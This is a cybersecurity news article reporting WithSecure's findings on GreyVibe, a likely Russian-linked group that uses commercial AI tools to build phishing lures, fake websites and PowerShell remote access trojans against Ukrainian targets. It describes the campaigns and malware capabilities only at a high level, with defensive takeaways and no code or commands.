Russian Hackers Use ChatGPT and Gemini to Build Malware
Key Takeaways
- GreyVibe has run a 10-month cyberespionage campaign targeting Ukrainian organizations using AI-generated content and malware
- The group uses ChatGPT, Gemini, and Ideogram AI to create phishing lures, fake websites, and custom hacking tools
- AI-generated code leaves detectable patterns that security researchers can use to track threat actors
AI as a Force Multiplier for Cyberespionage
A threat group with likely ties to Russia has turned commercial AI tools into weapons. The group, tracked as GreyVibe by cybersecurity firm WithSecure, has been using ChatGPT, Google Gemini, and image generator Ideogram AI to power a cyberespionage campaign against Ukrainian targets since at least August 2025.
WithSecure discovered the activity in January 2026. The researchers found that GreyVibe uses AI not just for writing phishing emails, but for building custom malware, creating realistic fake websites, and generating visual content that makes their lures more convincing.
“The use of AI is clearly lowering the barrier to entry, enabling actors with low-to-moderate technical skill to execute persistent and complex cyberespionage campaigns at scale.”
— WithSecure Research Team
The link to Russian-speaking operators comes from several technical indicators. The malware control panels use Russian language. Code comments are written in Russian. And the command-and-control servers are configured to Moscow time (UTC+3). WithSecure stopped short of calling it a nation-state operation, but noted the campaign aligns with Russian state interests.
Five Attack Chains, One Playbook
GreyVibe runs multiple attack campaigns simultaneously, each with a distinct approach. WithSecure identified five primary attack chains:
- PhantomMail: Spear-phishing emails with malicious ZIP or RAR files delivered through Google Drive and 4sync links. The emails impersonate Ukrainian government, emergency services, telecom, and energy organizations.
- PhantomClick: Fake CAPTCHA pages disguised as Zoom and LAPAS sites. Victims are tricked into running self-infecting commands through fake Cloudflare verification prompts.
- PrincessClub: Fake Ukrainian adult and dating websites that deliver Android spyware (FallSpy) and Windows malware (PhantomRelay, LegionRelay). The operators created fake female Telegram personas and later added WebRTC video calls to capture victims' audio and video.
- DroneLink: Fake Ukrainian military charity websites themed around FPV drones and UAVs. These share infrastructure with the PrincessClub campaigns.
- Nebo: Fake Russian military communications login pages designed to trick Ukrainian military personnel into thinking they're accessing a Russian military terminal.
AI-Built Malware and Obfuscation Tools
The AI assistance goes beyond content creation. WithSecure found that GreyVibe likely used large language models to develop several custom tools. These include LOOKVALPS, LOOKVALJS, DAYLIGHT, and TEASOUP, all obfuscation tools designed to hide malicious code from security software.
The group's primary weapon is LegionRelay, a PowerShell-based remote access trojan that WithSecure believes was built with AI assistance. LegionRelay can steal files, capture screenshots, grab browser credentials, extract data from Telegram and WhatsApp, and set up remote desktop access for the attackers.
A second RAT called PhantomRelay handles system fingerprinting and dynamic script loading. Both tools give GreyVibe persistent access to compromised systems.
AI Leaves a Trail
Here's the twist. The same AI tools that make GreyVibe more productive also make them easier to track. Security researchers identified distinct patterns in AI-generated code and images that function like a digital fingerprint.
Discussion on Reddit's r/cybersecurity and Hacker News has focused on these "AI-native" error patterns. Multiple security professionals noted that while AI speeds up attack development, the structural quirks in AI-generated content give defenders new ways to identify automated attacks.
WithSecure tracked GreyVibe for nearly a year by exploiting these patterns. The group's heavy reliance on AI-generated infrastructure created unique flaws that researchers could follow across campaigns.
Logicity's Take
What Organizations Should Watch For
GreyVibe's tactics offer a preview of what AI-enhanced attacks look like in practice. The quality of their phishing content is notably high. Emails and websites look professional. The decoy documents are convincing. The fake CAPTCHA pages could fool trained users.
Organizations connected to Ukraine or Ukrainian interests should treat this as an active threat. But the techniques GreyVibe uses will spread. Other groups will adopt similar AI-assisted methods. Security teams everywhere should prepare for phishing campaigns that look more polished and vary more rapidly than traditional attacks.
Frequently Asked Questions
What is GreyVibe?
GreyVibe is a likely Russian threat group discovered by WithSecure that uses AI tools like ChatGPT and Gemini to conduct cyberespionage against Ukrainian organizations. The group has been active since at least August 2025.
How do hackers use ChatGPT for cyberattacks?
GreyVibe uses ChatGPT and similar AI tools to write convincing phishing emails, create fake websites, generate realistic visual content, and develop custom malware and code obfuscation tools.
Can AI-generated malware be detected?
Yes. AI-generated code and content often contain distinctive patterns or structural quirks that security researchers can identify. WithSecure tracked GreyVibe for nearly a year by exploiting these AI fingerprints.
Who is being targeted by GreyVibe?
GreyVibe primarily targets Ukrainian or Ukraine-related organizations across military, government, civilian, and business sectors. Their phishing campaigns impersonate Ukrainian government agencies, energy companies, and telecom providers.
What malware does GreyVibe use?
The group uses several custom tools including LegionRelay and PhantomRelay (PowerShell RATs), FallSpy (Android spyware), and multiple code obfuscators (LOOKVALPS, LOOKVALJS, DAYLIGHT, TEASOUP).
Need Help Implementing This?
Source: BleepingComputer
Manaal Khan
Tech & Innovation Writer
Related Articles
Browse all
Kraken Crypto Exchange Extortion: Hackers Threaten to Leak Internal Videos After Insider Breach
Cryptocurrency exchange Kraken is being extorted by hackers who obtained videos of internal systems through bribed support employees. The company says no funds were compromised and refuses to pay, with only about 2,000 accounts affected. Kraken is working with federal law enforcement to prosecute everyone involved.
Windows 11 KB5083769 and KB5082052: April 2026 Patch Tuesday Brings Smart App Control Changes and Security Fixes
Microsoft's April 2026 Patch Tuesday updates are now live for Windows 11, bringing critical security patches alongside a welcome change to Smart App Control. You can finally toggle SAC on or off without wiping your entire system. The updates cover versions 23H2, 24H2, and 25H2.
Zero Trust Identity Security: 5 Ways This Framework Actually Stops Credential Theft
Stolen credentials caused 22% of breaches in 2025, making them the top attack vector. Zero Trust promises to fix this, but only when it's built around identity as the core principle. Here's how organizations can implement it properly.
Open Source PR Backlogs: Why Your GitHub Contribution Sits Unreviewed for a Year
A developer's Jellyfin pull request has been waiting over a year for merge despite two approvals, exposing a systemic crisis in open source maintenance. Queuing theory explains why backlogs grow exponentially, and 60% of maintainers have quit or considered quitting due to burnout.
Also Read
30 Racing Games IGN Calls Masterpieces for Its 30th Anniversary
IGN's 30th anniversary retrospective identifies the racing games that defined studios and set genre standards. The list spans arcade classics like OutRun to modern simulations, curated by criteria that prioritize developer-defining works over simple popularity.
Ferrari Luce EV Sold Out Through 2027 Despite Design Backlash
Ferrari's first fully electric vehicle, the $640,000 Luce, has sold out its entire production run through late 2027. The car's polarizing design by Jony Ive's LoveFrom collective drew criticism from purists, but collectors and new customers are buying anyway.
007 First Light Review: Competent Bond, Diluted Hitman
IO Interactive's James Bond origin story delivers a well-crafted spy narrative but struggles to balance its Hitman DNA with linear action gameplay. The result is a game that shines in moments but never fully commits to either design philosophy.